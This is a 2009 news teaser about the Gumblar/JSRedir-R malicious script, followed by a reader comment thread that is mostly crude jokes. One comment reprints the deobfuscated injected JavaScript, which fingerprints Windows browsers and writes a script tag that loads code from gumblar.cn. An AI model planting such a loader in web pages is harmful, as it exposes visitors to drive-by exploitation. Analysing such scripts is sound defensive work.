A newly-created malicious script has become the source of almost half the drive-by download attacks tracked by one security firm. JSRedir-R accounts for around 43 per cent of all malicious infections found on websites over the last week, according to a study by net security firm Sophos, published on Thursday. The malware crops …

COMMENTS

House rules Send corrections

This topic is closed for new posts.

Friday 15th May 2009 15:08 GMT Conrad Longmore

Another good writeup here

Another good writeup here: http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/

It seems to be cropping up all over the place with no obvious infection vector.

0 0
Friday 15th May 2009 15:08 GMT Anonymous Coward

2G1C

haha.

"Erm, I have a virus"

"Did you go on 2G1C?"

"Erm, yes...."

0 0
Friday 15th May 2009 15:10 GMT Anonymous Coward

2 girls 1 cup

I thought that was the most disgusting thing I'd ever seen on the internet, until I saw 1 man 1 jar.

I nearly threw up on my laptop.

0 0
Friday 15th May 2009 21:48 GMT Anonymous Coward

"2 Girls 1 Cup scat video viral website."

I guess they must have crappy security...

0 0
Friday 15th May 2009 21:48 GMT Anonymous Coward

Malware

I thought malware writes itself nowadays.

0 0
Friday 15th May 2009 21:48 GMT Kanhef

Clever script

I ran into this on one site, glad I had avast! running. The script was on every page, and an iframe on the home page only. There's a bit of obfuscation beyond the character escaping, which I've removed here. It checks for the browser running on pre-Vista Windows, and uses typeof() cleverly to make sure it only runs once. Note that it sends the JavaScript engine version number to gumblar.cn, which can then provide a script that is known to be effective on the user's particular browser, and divulge nothing to researchers using non-vulnerable browsers. Hopefully this is readable, the form refuses to respect any kind of formatting.

function(){

var versionString = "";

if( (navigator.userAgent.indexOf("Win")>0) && (navigator.userAgent.indexOf("NT 6")<0) && (document.cookie.indexOf("miek=1")<0) && (typeof(zrvzts)!=typeof("A")) ) {

zrvzts="A";

if(window.ScriptEngine) {

versionString = "" + ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion();

}

document.write(" <script src=//gumblar.cn/rss/?id=" + versionString + "></script>" );

} }

0 0
Friday 15th May 2009 22:45 GMT James O'Brien

@The Author

"The malicious script has also cropped up on the 2 Girls 1 Cup scat video viral website."

NO JUST NO

It took me a month to get that image out of my head and here you go putting it back there.

I guess im just going to do like Sam Neil in Event Horizon

http://www.ibiblio.org/samneill/pictures/eh/510beautiful1.jpg

/Good bye to my eyes

0 0
Saturday 16th May 2009 19:54 GMT Anonymous Coward

apple salesmen.

Apple will be happy, more of the the weak minded who get this kind of crap on their computer will be driven to buy a mac.(which is perfect for them).

Apple could write some themselves but they would be 200 megs and keep asking you if you want to update them.

0 0
Monday 18th May 2009 09:05 GMT Anonymous Coward

@AC 15.01

>I thought that was the most disgusting thing I'd ever seen on the internet, until I saw 1 man 1 jar.<

Yeah, thanks for that. You owe me a new computer. This one smells real bad now

0 0
Monday 18th May 2009 09:05 GMT Badminstyles

2g1c?

'2 girls 1 cup' < '1 guy 1 jar' < '1 guy 1 screwdriver'

god only knows whats going to be next.

0 0
Monday 18th May 2009 09:05 GMT Winkypop

I always thought it was:

2 girls 1 crap?

0 0
Monday 18th May 2009 13:37 GMT Throatwobbler Mangrove

Eric Arthur Blair suggests...

"god only knows whats going to be next."

Is it 1 Boot (stamping on) 1 Face (forever)?

0 0